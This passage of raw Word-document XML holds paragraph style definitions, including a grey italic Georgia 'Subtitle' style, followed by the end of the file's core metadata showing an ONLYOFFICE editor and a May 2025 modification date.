    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:sz w:val="72"/>
      <w:szCs w:val="72"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="902">
    <w:name w:val="Subtitle"/>
    <w:basedOn w:val="893"/>
    <w:next w:val="893"/>
    <w:pPr>
      <w:keepNext w:val="true"/>
      <w:keepLines w:val="true"/>
      <w:pageBreakBefore w:val="false"/>
      <w:pBdr/>
      <w:spacing w:after="80" w:before="360"/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia" w:eastAsia="Georgia" w:cs="Georgia"/>
      <w:i/>
      <w:color w:val="666666"/>
      <w:sz w:val="48"/>
      <w:szCs w:val="4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ONLYOFFICE/8.2.2.22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7</cp:revision>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-05-01T17:18:55Z</dcterms:modified>
</cp:coreProperties>
</file>